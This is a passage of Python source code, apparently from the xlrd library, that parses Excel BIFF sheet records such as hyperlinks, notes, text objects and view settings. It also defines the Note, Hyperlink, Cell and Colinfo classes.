c = Colinfo()
self.colinfo_map[colx] = c
c.xf_index = xf_index
elif rc == XL_WINDOW2_B2: # BIFF 2 only
attr_names = ("show_formulas", "show_grid_lines", "show_sheet_headers",
"panes_are_frozen", "show_zero_values")
for attr, char in zip(attr_names, data[0:5]):
setattr(self, attr, int(char != b'\0'))
(self.first_visible_rowx, self.first_visible_colx,
self.automatic_grid_line_colour,
) = unpack("<HHB", data[5:10])
self.gridline_colour_rgb = unpack("<BBB", data[10:13])
self.gridline_colour_index = nearest_colour_index(
self.book.colour_map, self.gridline_colour_rgb, debug=0)
self.cached_page_break_preview_mag_factor = 0 # default (60%)
self.cached_normal_view_mag_factor = 0 # default (100%)
else:
# if DEBUG: print "SHEET.READ: Unhandled record type %02x %d bytes %r" % (rc, data_len, data)
pass
if not eof_found:
raise XLRDError("Sheet %d (%r) missing EOF record" \
% (self.number, self.name))
self.tidy_dimensions()
self.update_cooked_mag_factors()
bk._position = oldpos
return 1
def string_record_contents(self, data):
bv = self.biff_version
bk = self.book
lenlen = (bv >= 30) + 1
nchars_expected = unpack("<" + "BH"[lenlen - 1], data[:lenlen])[0]
offset = lenlen
if bv < 80:
enc = bk.encoding or bk.derive_encoding()
nchars_found = 0
result = UNICODE_LITERAL("")
while 1:
if bv >= 80:
flag = BYTES_ORD(data[offset]) & 1
enc = ("latin_1", "utf_16_le")[flag]
offset += 1
chunk = unicode(data[offset:], enc)
result += chunk
nchars_found += len(chunk)
if nchars_found == nchars_expected:
return result
if nchars_found > nchars_expected:
msg = ("STRING/CONTINUE: expected %d chars, found %d"
% (nchars_expected, nchars_found))
raise XLRDError(msg)
rc, _unused_len, data = bk.get_record_parts()
if rc != XL_CONTINUE:
raise XLRDError(
"Expected CONTINUE record; found record-type 0x%04X" % rc)
offset = 0
def update_cooked_mag_factors(self):
# Cached values are used ONLY for the non-active view mode.
# When the user switches to the non-active view mode,
# if the cached value for that mode is not valid,
# Excel pops up a window which says:
# "The number must be between 10 and 400. Try again by entering a number in this range."
# When the user hits OK, it drops into the non-active view mode
# but uses the magn from the active mode.
# NOTE: definition of "valid" depends on mode ... see below
blah = DEBUG or self.verbosity > 0
if self.show_in_page_break_preview:
if self.scl_mag_factor is None: # no SCL record
self.cooked_page_break_preview_mag_factor = 100 # Yes, 100, not 60, NOT a typo
else:
self.cooked_page_break_preview_mag_factor = self.scl_mag_factor
zoom = self.cached_normal_view_mag_factor
if not (10 <= zoom <=400):
if blah:
print((
"WARNING *** WINDOW2 rcd sheet %d: Bad cached_normal_view_mag_factor: %d"
% (self.number, self.cached_normal_view_mag_factor)
), file=self.logfile)
zoom = self.cooked_page_break_preview_mag_factor
self.cooked_normal_view_mag_factor = zoom
else:
# normal view mode
if self.scl_mag_factor is None: # no SCL record
self.cooked_normal_view_mag_factor = 100
else:
self.cooked_normal_view_mag_factor = self.scl_mag_factor
zoom = self.cached_page_break_preview_mag_factor
if zoom == 0:
# VALID, defaults to 60
zoom = 60
elif not (10 <= zoom <= 400):
if blah:
print((
"WARNING *** WINDOW2 rcd sheet %r: Bad cached_page_break_preview_mag_factor: %r"
% (self.number, self.cached_page_break_preview_mag_factor)
), file=self.logfile)
zoom = self.cooked_normal_view_mag_factor
self.cooked_page_break_preview_mag_factor = zoom
def fixed_BIFF2_xfindex(self, cell_attr, rowx, colx, true_xfx=None):
DEBUG = 0
blah = DEBUG or self.verbosity >= 2
if self.biff_version == 21:
if self.book.xf_list:
if true_xfx is not None:
xfx = true_xfx
else:
xfx = BYTES_ORD(cell_attr[0]) & 0x3F
if xfx == 0x3F:
if self._ixfe is None:
raise XLRDError("BIFF2 cell record has XF index 63 but no preceding IXFE record.")
xfx = self._ixfe
# OOo docs are capable of interpretation that each
# cell record is preceded immediately by its own IXFE record.
# Empirical evidence is that (sensibly) an IXFE record applies to all
# following cell records until another IXFE comes along.
return xfx
# Have either Excel 2.0, or broken 2.1 w/o XF records -- same effect.
self.biff_version = self.book.biff_version = 20
#### check that XF slot in cell_attr is zero
xfx_slot = BYTES_ORD(cell_attr[0]) & 0x3F
assert xfx_slot == 0
xfx = self._cell_attr_to_xfx.get(cell_attr)
if xfx is not None:
return xfx
if blah:
fprintf(self.logfile, "New cell_attr %r at (%r, %r)\n", cell_attr, rowx, colx)
if not self.book.xf_list:
for xfx in xrange(16):
self.insert_new_BIFF20_xf(cell_attr=b"\x40\x00\x00", style=xfx < 15)
xfx = self.insert_new_BIFF20_xf(cell_attr=cell_attr)
return xfx
def insert_new_BIFF20_xf(self, cell_attr, style=0):
DEBUG = 0
blah = DEBUG or self.verbosity >= 2
book = self.book
xfx = len(book.xf_list)
xf = self.fake_XF_from_BIFF20_cell_attr(cell_attr, style)
xf.xf_index = xfx
book.xf_list.append(xf)
if blah:
xf.dump(self.logfile, header="=== Faked XF %d ===" % xfx, footer="======")
if xf.format_key not in book.format_map:
if xf.format_key:
msg = "ERROR *** XF[%d] unknown format key (%d, 0x%04x)\n"
fprintf(self.logfile, msg,
xf.xf_index, xf.format_key, xf.format_key)
fmt = Format(xf.format_key, FUN, UNICODE_LITERAL("General"))
book.format_map[xf.format_key] = fmt
book.format_list.append(fmt)
cellty_from_fmtty = {
FNU: XL_CELL_NUMBER,
FUN: XL_CELL_NUMBER,
FGE: XL_CELL_NUMBER,
FDT: XL_CELL_DATE,
FTX: XL_CELL_NUMBER, # Yes, a number can be formatted as text.
}
fmt = book.format_map[xf.format_key]
cellty = cellty_from_fmtty[fmt.type]
self._xf_index_to_xl_type_map[xf.xf_index] = cellty
self._cell_attr_to_xfx[cell_attr] = xfx
return xfx
def fake_XF_from_BIFF20_cell_attr(self, cell_attr, style=0):
from .formatting import XF, XFAlignment, XFBorder, XFBackground, XFProtection
xf = XF()
xf.alignment = XFAlignment()
xf.alignment.indent_level = 0
xf.alignment.shrink_to_fit = 0
xf.alignment.text_direction = 0
xf.border = XFBorder()
xf.border.diag_up = 0
xf.border.diag_down = 0
xf.border.diag_colour_index = 0
xf.border.diag_line_style = 0 # no line
xf.background = XFBackground()
xf.protection = XFProtection()
(prot_bits, font_and_format, halign_etc) = unpack('<BBB', cell_attr)
xf.format_key = font_and_format & 0x3F
xf.font_index = (font_and_format & 0xC0) >> 6
upkbits(xf.protection, prot_bits, (
(6, 0x40, 'cell_locked'),
(7, 0x80, 'formula_hidden'),
))
xf.alignment.hor_align = halign_etc & 0x07
for mask, side in ((0x08, 'left'), (0x10, 'right'), (0x20, 'top'), (0x40, 'bottom')):
if halign_etc & mask:
colour_index, line_style = 8, 1 # black, thin
else:
colour_index, line_style = 0, 0 # none, none
setattr(xf.border, side + '_colour_index', colour_index)
setattr(xf.border, side + '_line_style', line_style)
bg = xf.background
if halign_etc & 0x80:
bg.fill_pattern = 17
else:
bg.fill_pattern = 0
bg.background_colour_index = 9 # white
bg.pattern_colour_index = 8 # black
xf.parent_style_index = (0x0FFF, 0)[style]
xf.alignment.vert_align = 2 # bottom
xf.alignment.rotation = 0
for attr_stem in \
"format font alignment border background protection".split():
attr = "_" + attr_stem + "_flag"
setattr(xf, attr, 1)
return xf
def req_fmt_info(self):
if not self.formatting_info:
raise XLRDError("Feature requires open_workbook(..., formatting_info=True)")
##
# Determine column display width.
# <br /> -- New in version 0.6.1
# <br />
# @param colx Index of the queried column, range 0 to 255.
# Note that it is possible to find out the width that will be used to display
# columns with no cell information e.g. column IV (colx=255).
# @return The column width that will be used for displaying
# the given column by Excel, in units of 1/256th of the width of a
# standard character (the digit zero in the first font).
def computed_column_width(self, colx):
self.req_fmt_info()
if self.biff_version >= 80:
colinfo = self.colinfo_map.get(colx, None)
if colinfo is not None:
return colinfo.width
if self.standardwidth is not None:
return self.standardwidth
elif self.biff_version >= 40:
if self.gcw[colx]:
if self.standardwidth is not None:
return self.standardwidth
else:
colinfo = self.colinfo_map.get(colx, None)
if colinfo is not None:
return colinfo.width
elif self.biff_version == 30:
colinfo = self.colinfo_map.get(colx, None)
if colinfo is not None:
return colinfo.width
# All roads lead to Rome and the DEFCOLWIDTH ...
if self.defcolwidth is not None:
return self.defcolwidth * 256
return 8 * 256 # 8 is what Excel puts in a DEFCOLWIDTH record
def handle_hlink(self, data):
# DEBUG = 1
if DEBUG: print("\n=== hyperlink ===", file=self.logfile)
record_size = len(data)
h = Hyperlink()
h.frowx, h.lrowx, h.fcolx, h.lcolx, guid0, dummy, options = unpack('<HHHH16s4si', data[:32])
assert guid0 == b"\xD0\xC9\xEA\x79\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00\x4B\xA9\x0B"
assert dummy == b"\x02\x00\x00\x00"
if DEBUG: print("options: %08X" % options, file=self.logfile)
offset = 32
def get_nul_terminated_unicode(buf, ofs):
nb = unpack('<L', buf[ofs:ofs+4])[0] * 2
ofs += 4
uc = unicode(buf[ofs:ofs+nb], 'UTF-16le')[:-1]
ofs += nb
return uc, ofs
if options & 0x14: # has a description
h.desc, offset = get_nul_terminated_unicode(data, offset)
if options & 0x80: # has a target
h.target, offset = get_nul_terminated_unicode(data, offset)
if (options & 1) and not (options & 0x100): # HasMoniker and not MonikerSavedAsString
# an OLEMoniker structure
clsid, = unpack('<16s', data[offset:offset + 16])
if DEBUG: fprintf(self.logfile, "clsid=%r\n", clsid)
offset += 16
if clsid == b"\xE0\xC9\xEA\x79\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00\x4B\xA9\x0B":
# E0H C9H EAH 79H F9H BAH CEH 11H 8CH 82H 00H AAH 00H 4BH A9H 0BH
# URL Moniker
h.type = UNICODE_LITERAL('url')
nbytes = unpack('<L', data[offset:offset + 4])[0]
offset += 4
h.url_or_path = unicode(data[offset:offset + nbytes], 'UTF-16le')
if DEBUG: fprintf(self.logfile, "initial url=%r len=%d\n", h.url_or_path, len(h.url_or_path))
endpos = h.url_or_path.find('\x00')
if DEBUG: print("endpos=%d" % endpos, file=self.logfile)
h.url_or_path = h.url_or_path[:endpos]
true_nbytes = 2 * (endpos + 1)
offset += true_nbytes
extra_nbytes = nbytes - true_nbytes
extra_data = data[offset:offset + extra_nbytes]
offset += extra_nbytes
if DEBUG:
fprintf(
self.logfile,
"url=%r\nextra=%r\nnbytes=%d true_nbytes=%d extra_nbytes=%d\n",
h.url_or_path, extra_data, nbytes, true_nbytes, extra_nbytes,
)
assert extra_nbytes in (24, 0)
elif clsid == b"\x03\x03\x00\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46":
# file moniker
h.type = UNICODE_LITERAL('local file')
uplevels, nbytes = unpack("<Hi", data[offset:offset + 6])
offset += 6
shortpath = b"..\\" * uplevels + data[offset:offset + nbytes - 1] #### BYTES, not unicode
if DEBUG: fprintf(self.logfile, "uplevels=%d shortpath=%r\n", uplevels, shortpath)
offset += nbytes
offset += 24 # OOo: "unknown byte sequence"
# above is version 0xDEAD + 20 reserved zero bytes
sz = unpack('<i', data[offset:offset + 4])[0]
if DEBUG: print("sz=%d" % sz, file=self.logfile)
offset += 4
if sz:
xl = unpack('<i', data[offset:offset + 4])[0]
offset += 4
offset += 2 # "unknown byte sequence" MS: 0x0003
extended_path = unicode(data[offset:offset + xl], 'UTF-16le') # not zero-terminated
offset += xl
h.url_or_path = extended_path
else:
h.url_or_path = shortpath
#### MS KLUDGE WARNING ####
# The "shortpath" is bytes encoded in the **UNKNOWN** creator's "ANSI" encoding.
else:
fprintf(self.logfile, "*** unknown clsid %r\n", clsid)
elif options & 0x163 == 0x103: # UNC
h.type = UNICODE_LITERAL('unc')
h.url_or_path, offset = get_nul_terminated_unicode(data, offset)
elif options & 0x16B == 8:
h.type = UNICODE_LITERAL('workbook')
else:
h.type = UNICODE_LITERAL('unknown')
if options & 0x8: # has textmark
h.textmark, offset = get_nul_terminated_unicode(data, offset)
if DEBUG:
h.dump(header="... object dump ...")
print("offset=%d record_size=%d" % (offset, record_size))
extra_nbytes = record_size - offset
if extra_nbytes > 0:
fprintf(
self.logfile,
"*** WARNING: hyperlink at r=%d c=%d has %d extra data bytes: %s\n",
h.frowx,
h.fcolx,
extra_nbytes,
REPR(data[-extra_nbytes:])
)
# Seen: b"\x00\x00" also b"A\x00", b"V\x00"
elif extra_nbytes < 0:
raise XLRDError("Bug or corrupt file, send copy of input file for debugging")
self.hyperlink_list.append(h)
for rowx in xrange(h.frowx, h.lrowx+1):
for colx in xrange(h.fcolx, h.lcolx+1):
self.hyperlink_map[rowx, colx] = h
def handle_quicktip(self, data):
rcx, frowx, lrowx, fcolx, lcolx = unpack('<5H', data[:10])
assert rcx == XL_QUICKTIP
assert self.hyperlink_list
h = self.hyperlink_list[-1]
assert (frowx, lrowx, fcolx, lcolx) == (h.frowx, h.lrowx, h.fcolx, h.lcolx)
assert data[-2:] == b'\x00\x00'
h.quicktip = unicode(data[10:-2], 'utf_16_le')
def handle_msodrawingetc(self, recid, data_len, data):
if not OBJ_MSO_DEBUG:
return
DEBUG = 1
if self.biff_version < 80:
return
o = MSODrawing()
pos = 0
while pos < data_len:
tmp, fbt, cb = unpack('<HHI', data[pos:pos+8])
ver = tmp & 0xF
inst = (tmp >> 4) & 0xFFF
if ver == 0xF:
ndb = 0 # container
else:
ndb = cb
if DEBUG:
hex_char_dump(data, pos, ndb + 8, base=0, fout=self.logfile)
fprintf(self.logfile,
"fbt:0x%04X inst:%d ver:0x%X cb:%d (0x%04X)\n",
fbt, inst, ver, cb, cb)
if fbt == 0xF010: # Client Anchor
assert ndb == 18
(o.anchor_unk,
o.anchor_colx_lo, o.anchor_rowx_lo,
o.anchor_colx_hi, o.anchor_rowx_hi) = unpack('<Hiiii', data[pos+8:pos+8+ndb])
elif fbt == 0xF011: # Client Data
# must be followed by an OBJ record
assert cb == 0
assert pos + 8 == data_len
else:
pass
pos += ndb + 8
else:
# didn't break out of while loop
assert pos == data_len
if DEBUG:
o.dump(self.logfile, header="=== MSODrawing ===", footer= " ")
def handle_obj(self, data):
if self.biff_version < 80:
return None
o = MSObj()
data_len = len(data)
pos = 0
if OBJ_MSO_DEBUG:
fprintf(self.logfile, "... OBJ record len=%d...\n", data_len)
while pos < data_len:
ft, cb = unpack('<HH', data[pos:pos+4])
if OBJ_MSO_DEBUG:
fprintf(self.logfile, "pos=%d ft=0x%04X cb=%d\n", pos, ft, cb)
hex_char_dump(data, pos, cb + 4, base=0, fout=self.logfile)
if pos == 0 and not (ft == 0x15 and cb == 18):
if self.verbosity:
fprintf(self.logfile, "*** WARNING Ignoring antique or corrupt OBJECT record\n")
return None
if ft == 0x15: # ftCmo ... s/b first
assert pos == 0
o.type, o.id, option_flags = unpack('<HHH', data[pos+4:pos+10])
upkbits(o, option_flags, (
( 0, 0x0001, 'locked'),
( 4, 0x0010, 'printable'),
( 8, 0x0100, 'autofilter'), # not documented in Excel 97 dev kit
( 9, 0x0200, 'scrollbar_flag'), # not documented in Excel 97 dev kit
(13, 0x2000, 'autofill'),
(14, 0x4000, 'autoline'),
))
elif ft == 0x00:
if data[pos:data_len] == b'\0' * (data_len - pos):
# ignore "optional reserved" data at end of record
break
msg = "Unexpected data at end of OBJECT record"
fprintf(self.logfile, "*** ERROR %s\n" % msg)
hex_char_dump(data, pos, data_len - pos, base=0, fout=self.logfile)
raise XLRDError(msg)
elif ft == 0x0C: # Scrollbar
values = unpack('<5H', data[pos+8:pos+18])
for value, tag in zip(values, ('value', 'min', 'max', 'inc', 'page')):
setattr(o, 'scrollbar_' + tag, value)
elif ft == 0x0D: # "Notes structure" [used for cell comments]
# not documented in Excel 97 dev kit
if OBJ_MSO_DEBUG: fprintf(self.logfile, "*** OBJ record has ft==0x0D 'notes' structure\n")
elif ft == 0x13: # list box data
if o.autofilter: # non standard exit. NOT documented
break
else:
pass
pos += cb + 4
else:
# didn't break out of while loop
pass
if OBJ_MSO_DEBUG:
o.dump(self.logfile, header="=== MSOBj ===", footer= " ")
return o
def handle_note(self, data, txos):
if OBJ_MSO_DEBUG:
fprintf(self.logfile, '... NOTE record ...\n')
hex_char_dump(data, 0, len(data), base=0, fout=self.logfile)
o = Note()
data_len = len(data)
if self.biff_version < 80:
o.rowx, o.colx, expected_bytes = unpack('<HHH', data[:6])
nb = len(data) - 6
assert nb <= expected_bytes
pieces = [data[6:]]
expected_bytes -= nb
while expected_bytes > 0:
rc2, data2_len, data2 = self.book.get_record_parts()
assert rc2 == XL_NOTE
dummy_rowx, nb = unpack('<H2xH', data2[:6])
assert dummy_rowx == 0xFFFF
assert nb == data2_len - 6
pieces.append(data2[6:])
expected_bytes -= nb
assert expected_bytes == 0
enc = self.book.encoding or self.book.derive_encoding()
o.text = unicode(b''.join(pieces), enc)
o.rich_text_runlist = [(0, 0)]
o.show = 0
o.row_hidden = 0
o.col_hidden = 0
o.author = UNICODE_LITERAL('')
o._object_id = None
self.cell_note_map[o.rowx, o.colx] = o
return
# Excel 8.0+
o.rowx, o.colx, option_flags, o._object_id = unpack('<4H', data[:8])
o.show = (option_flags >> 1) & 1
o.row_hidden = (option_flags >> 7) & 1
o.col_hidden = (option_flags >> 8) & 1
# XL97 dev kit book says NULL [sic] bytes padding between string count and string data
# to ensure that string is word-aligned. Appears to be nonsense.
o.author, endpos = unpack_unicode_update_pos(data, 8, lenlen=2)
# There is a random/undefined byte after the author string (not counted in the
# string length).
# Issue 4 on github: Google Spreadsheet doesn't write the undefined byte.
assert (data_len - endpos) in (0, 1)
if OBJ_MSO_DEBUG:
o.dump(self.logfile, header="=== Note ===", footer= " ")
txo = txos.get(o._object_id)
if txo:
o.text = txo.text
o.rich_text_runlist = txo.rich_text_runlist
self.cell_note_map[o.rowx, o.colx] = o
def handle_txo(self, data):
if self.biff_version < 80:
return
o = MSTxo()
data_len = len(data)
fmt = '<HH6sHHH'
fmtsize = calcsize(fmt)
option_flags, o.rot, controlInfo, cchText, cbRuns, o.ifntEmpty = unpack(fmt, data[:fmtsize])
o.fmla = data[fmtsize:]
upkbits(o, option_flags, (
( 3, 0x000E, 'horz_align'),
( 6, 0x0070, 'vert_align'),
( 9, 0x0200, 'lock_text'),
(14, 0x4000, 'just_last'),
(15, 0x8000, 'secret_edit'),
))
totchars = 0
o.text = UNICODE_LITERAL('')
while totchars < cchText:
rc2, data2_len, data2 = self.book.get_record_parts()
assert rc2 == XL_CONTINUE
if OBJ_MSO_DEBUG:
hex_char_dump(data2, 0, data2_len, base=0, fout=self.logfile)
nb = BYTES_ORD(data2[0]) # 0 means latin1, 1 means utf_16_le
nchars = data2_len - 1
if nb:
assert nchars % 2 == 0
nchars //= 2
utext, endpos = unpack_unicode_update_pos(data2, 0, known_len=nchars)
assert endpos == data2_len
o.text += utext
totchars += nchars
o.rich_text_runlist = []
totruns = 0
while totruns < cbRuns: # counts of BYTES, not runs
rc3, data3_len, data3 = self.book.get_record_parts()
# print totruns, cbRuns, rc3, data3_len, repr(data3)
assert rc3 == XL_CONTINUE
assert data3_len % 8 == 0
for pos in xrange(0, data3_len, 8):
run = unpack('<HH4x', data3[pos:pos+8])
o.rich_text_runlist.append(run)
totruns += 8
# remove trailing entries that point to the end of the string
while o.rich_text_runlist and o.rich_text_runlist[-1][0] == cchText:
del o.rich_text_runlist[-1]
if OBJ_MSO_DEBUG:
o.dump(self.logfile, header="=== MSTxo ===", footer= " ")
print(o.rich_text_runlist, file=self.logfile)
return o
def handle_feat11(self, data):
if not OBJ_MSO_DEBUG:
return
# rt: Record type; this matches the BIFF rt in the first two bytes of the record; =0872h
# grbitFrt: FRT cell reference flag (see table below for details)
# Ref0: Range reference to a worksheet cell region if grbitFrt=1 (bitFrtRef). Otherwise blank.
# isf: Shared feature type index =5 for Table
# fHdr: =0 since this is for feat not feat header
# reserved0: Reserved for future use =0 for Table
# cref: Count of ref ranges this feature is on
# cbFeatData: Count of byte for the current feature data.
# reserved1: =0 currently not used
# Ref1: Repeat of Ref0. UNDOCUMENTED
rt, grbitFrt, Ref0, isf, fHdr, reserved0, cref, cbFeatData, reserved1, Ref1 = unpack('<HH8sHBiHiH8s', data[0:35])
assert reserved0 == 0
assert reserved1 == 0
assert isf == 5
assert rt == 0x872
assert fHdr == 0
assert Ref1 == Ref0
print(self.logfile, "FEAT11: grbitFrt=%d Ref0=%r cref=%d cbFeatData=%d\n", grbitFrt, Ref0, cref, cbFeatData)
# lt: Table data source type:
# =0 for Excel Worksheet Table =1 for read-write SharePoint linked List
# =2 for XML mapper Table =3 for Query Table
# idList: The ID of the Table (unique per worksheet)
# crwHeader: How many header/title rows the Table has at the top
# crwTotals: How many total rows the Table has at the bottom
# idFieldNext: Next id to try when assigning a unique id to a new field
# cbFSData: The size of the Fixed Data portion of the Table data structure.
# rupBuild: the rupBuild that generated the record
# unusedShort: UNUSED short that can be used later. The value is reserved during round-tripping.
# listFlags: Collection of bit flags: (see listFlags' bit setting table below for detail.)
# lPosStmCache: Table data stream position of cached data
# cbStmCache: Count of bytes of cached data
# cchStmCache: Count of characters of uncompressed cached data in the stream
# lem: Table edit mode (see List (Table) Editing Mode (lem) setting table below for details.)
# rgbHashParam: Hash value for SharePoint Table
# cchName: Count of characters in the Table name string rgbName
(lt, idList, crwHeader, crwTotals, idFieldNext, cbFSData,
rupBuild, unusedShort, listFlags, lPosStmCache, cbStmCache,
cchStmCache, lem, rgbHashParam, cchName) = unpack('<iiiiiiHHiiiii16sH', data[35:35+66])
print("lt=%d idList=%d crwHeader=%d crwTotals=%d idFieldNext=%d cbFSData=%d\n"\
"rupBuild=%d unusedShort=%d listFlags=%04X lPosStmCache=%d cbStmCache=%d\n"\
"cchStmCache=%d lem=%d rgbHashParam=%r cchName=%d" % (
lt, idList, crwHeader, crwTotals, idFieldNext, cbFSData,
rupBuild, unusedShort,listFlags, lPosStmCache, cbStmCache,
cchStmCache, lem, rgbHashParam, cchName), file=self.logfile)
class MSODrawing(BaseObject):
pass
class MSObj(BaseObject):
pass
class MSTxo(BaseObject):
pass
##
# <p> Represents a user "comment" or "note".
# Note objects are accessible through Sheet.{@link #Sheet.cell_note_map}.
# <br />-- New in version 0.7.2
# </p>
class Note(BaseObject):
##
# Author of note
author = UNICODE_LITERAL('')
##
# True if the containing column is hidden
col_hidden = 0
##
# Column index
colx = 0
##
# List of (offset_in_string, font_index) tuples.
# Unlike Sheet.{@link #Sheet.rich_text_runlist_map}, the first offset should always be 0.
rich_text_runlist = None
##
# True if the containing row is hidden
row_hidden = 0
##
# Row index
rowx = 0
##
# True if note is always shown
show = 0
##
# Text of the note
text = UNICODE_LITERAL('')
##
# <p>Contains the attributes of a hyperlink.
# Hyperlink objects are accessible through Sheet.{@link #Sheet.hyperlink_list}
# and Sheet.{@link #Sheet.hyperlink_map}.
# <br />-- New in version 0.7.2
# </p>
class Hyperlink(BaseObject):
##
# Index of first row
frowx = None
##
# Index of last row
lrowx = None
##
# Index of first column
fcolx = None
##
# Index of last column
lcolx = None
##
# Type of hyperlink. Unicode string, one of 'url', 'unc',
# 'local file', 'workbook', 'unknown'
type = None
##
# The URL or file-path, depending in the type. Unicode string, except
# in the rare case of a local but non-existent file with non-ASCII
# characters in the name, in which case only the "8.3" filename is available,
# as a bytes (3.x) or str (2.x) string, <i>with unknown encoding.</i>
url_or_path = None
##
# Description ... this is displayed in the cell,
# and should be identical to the cell value. Unicode string, or None. It seems
# impossible NOT to have a description created by the Excel UI.
desc = None
##
# Target frame. Unicode string. Note: I have not seen a case of this.
# It seems impossible to create one in the Excel UI.
target = None
##
# "Textmark": the piece after the "#" in
# "http://docs.python.org/library#struct_module", or the Sheet1!A1:Z99
# part when type is "workbook".
textmark = None
##
# The text of the "quick tip" displayed when the cursor
# hovers over the hyperlink.
quicktip = None
# === helpers ===
def unpack_RK(rk_str):
flags = BYTES_ORD(rk_str[0])
if flags & 2:
# There's a SIGNED 30-bit integer in there!
i, = unpack('<i', rk_str)
i >>= 2 # div by 4 to drop the 2 flag bits
if flags & 1:
return i / 100.0
return float(i)
else:
# It's the most significant 30 bits of an IEEE 754 64-bit FP number
d, = unpack('<d', b'\0\0\0\0' + BYTES_LITERAL(chr(flags & 252)) + rk_str[1:4])
if flags & 1:
return d / 100.0
return d
##### =============== Cell ======================================== #####
cellty_from_fmtty = {
FNU: XL_CELL_NUMBER,
FUN: XL_CELL_NUMBER,
FGE: XL_CELL_NUMBER,
FDT: XL_CELL_DATE,
FTX: XL_CELL_NUMBER, # Yes, a number can be formatted as text.
}
ctype_text = {
XL_CELL_EMPTY: 'empty',
XL_CELL_TEXT: 'text',
XL_CELL_NUMBER: 'number',
XL_CELL_DATE: 'xldate',
XL_CELL_BOOLEAN: 'bool',
XL_CELL_ERROR: 'error',
XL_CELL_BLANK: 'blank',
}
##
# <p>Contains the data for one cell.</p>
#
# <p>WARNING: You don't call this class yourself. You access Cell objects
# via methods of the {@link #Sheet} object(s) that you found in the {@link #Book} object that
# was returned when you called xlrd.open_workbook("myfile.xls").</p>
# <p> Cell objects have three attributes: <i>ctype</i> is an int, <i>value</i>
# (which depends on <i>ctype</i>) and <i>xf_index</i>.
# If "formatting_info" is not enabled when the workbook is opened, xf_index will be None.
# The following table describes the types of cells and how their values
# are represented in Python.</p>
#
# <table border="1" cellpadding="7">
# <tr>
# <th>Type symbol</th>
# <th>Type number</th>
# <th>Python value</th>
# </tr>
# <tr>
# <td>XL_CELL_EMPTY</td>
# <td align="center">0</td>
# <td>empty string u''</td>
# </tr>
# <tr>
# <td>XL_CELL_TEXT</td>
# <td align="center">1</td>
# <td>a Unicode string</td>
# </tr>
# <tr>
# <td>XL_CELL_NUMBER</td>
# <td align="center">2</td>
# <td>float</td>
# </tr>
# <tr>
# <td>XL_CELL_DATE</td>
# <td align="center">3</td>
# <td>float</td>
# </tr>
# <tr>
# <td>XL_CELL_BOOLEAN</td>
# <td align="center">4</td>
# <td>int; 1 means TRUE, 0 means FALSE</td>
# </tr>
# <tr>
# <td>XL_CELL_ERROR</td>
# <td align="center">5</td>
# <td>int representing internal Excel codes; for a text representation,
# refer to the supplied dictionary error_text_from_code</td>
# </tr>
# <tr>
# <td>XL_CELL_BLANK</td>
# <td align="center">6</td>
# <td>empty string u''. Note: this type will appear only when
# open_workbook(..., formatting_info=True) is used.</td>
# </tr>
# </table>
#<p></p>
class Cell(BaseObject):
__slots__ = ['ctype', 'value', 'xf_index']
def __init__(self, ctype, value, xf_index=None):
self.ctype = ctype
self.value = value
self.xf_index = xf_index
def __repr__(self):
if self.xf_index is None:
return "%s:%r" % (ctype_text[self.ctype], self.value)
else:
return "%s:%r (XF:%r)" % (ctype_text[self.ctype], self.value, self.xf_index)
##
# There is one and only one instance of an empty cell -- it's a singleton. This is it.
# You may use a test like "acell is empty_cell".
empty_cell = Cell(XL_CELL_EMPTY, '')
##### =============== Colinfo and Rowinfo ============================== #####
##
# Width and default formatting information that applies to one or
# more columns in a sheet. Derived from COLINFO records.
#
# <p> Here is the default hierarchy for width, according to the OOo docs:
#
# <br />"""In BIFF3, if a COLINFO record is missing for a column,
# the width specified in the record DEFCOLWIDTH is used instead.
#
# <br />In BIFF4-BIFF7, the width set in this [COLINFO] record is only used,
# if the corresponding bit for this column is cleared in the GCW
# record, otherwise the column width set in the DEFCOLWIDTH record
# is used (the STANDARDWIDTH record is always ignored in this case [see footnote!]).
#
# <br />In BIFF8, if a COLINFO record is missing for a column,
# the width specified in the record STANDARDWIDTH is used.
# If this [STANDARDWIDTH] record is also missing,
# the column width of the record DEFCOLWIDTH is used instead."""
# <br />
#
# Footnote: The docs on the GCW record say this:
# """<br />
# If a bit is set, the corresponding column uses the width set in the STANDARDWIDTH
# record. If a bit is cleared, the corresponding column uses the width set in the
# COLINFO record for this column.
# <br />If a bit is set, and the worksheet does not contain the STANDARDWIDTH record, or if
# the bit is cleared, and the worksheet does not contain the COLINFO record, the DEFCOLWIDTH
# record of the worksheet will be used instead.
# <br />"""<br />
# At the moment (2007-01-17) xlrd is going with the GCW version of the story.
# Reference to the source may be useful: see the computed_column_width(colx) method
# of the Sheet class.
# <br />-- New in version 0.6.1
# </p>
class Colinfo(BaseObject):
##
# Width of the column in 1/256 of the width of the zero character,
# using default font (first FONT record in the file).
width = 0
##
# XF index to be used for formatting empty cells.
xf_index = -1
##
# 1 = column is hidden
hidden = 0
##
# Value of a 1-bit flag whose purpose is unknown
# but is often seen set to 1
bit1_flag = 0
##
# Outline level of the column, in range(7).
# (0 = no outline)
outline_level = 0
##
# 1 = column is collapsed
collapsed = 0
_USE_SLOTS = 1
##
# <p>Height and default formatting information that applies to a row in a sheet.
# Derived from ROW records.
# <br /> -- New in version 0.6.1</p>
#
# <p><b>height</b>: Height of the row, in twips. One twip == 1/20 of a point.</p>
#
# <p><b>has_default_height</b>: 0 = Row has custom height; 1 = Row has default height.</p>
#
# <p><b>outline_level</b>: Outline level of the row (0 to 7) </p>
#
# <p><b>outline_group_starts_ends</b>: 1 = Outline group starts or ends here (depending on where the
# outline buttons are located, see WSBOOL record [TODO ??]),
# <i>and</i> is collapsed </p>
#
# <p><b>hidden</b>: 1 = Row is hidden (manually, or by a filter or outline group) </p>
#
# <p><b>height_mismatch</b>: 1 = Row height and default font height do not match </p>
#
# <p><b>has_default_xf_index</b>: 1 = the xf_index attribute is usable; 0 = ignore it </p>
#
# <p><b>xf_index</b>: Index to default XF record for empty cells in this row.
# Don't use this if has_default_xf_index == 0. </p>
#
# <p><b>additional_space_above</b>: This flag is set, if the upper border of at least one cell in this row
# or if the lower border of at least one cell in the row above is
# formatted with a thick line style. Thin and medium line styles are not
# taken into account. </p>
#
# <p><b>additional_space_below</b>: This flag is set, if the lower border of at least one cell in this row
# or if the upper border of at least one cell in the row below is
# formatted with a medium or thick line style. Thin line styles are not
# taken into account. </p>
class Rowinfo(BaseObject):
if _USE_SLOTS:
__slots__ = (
"height",
"has_default_height",
"outline_level",
"outline_group_starts_ends",
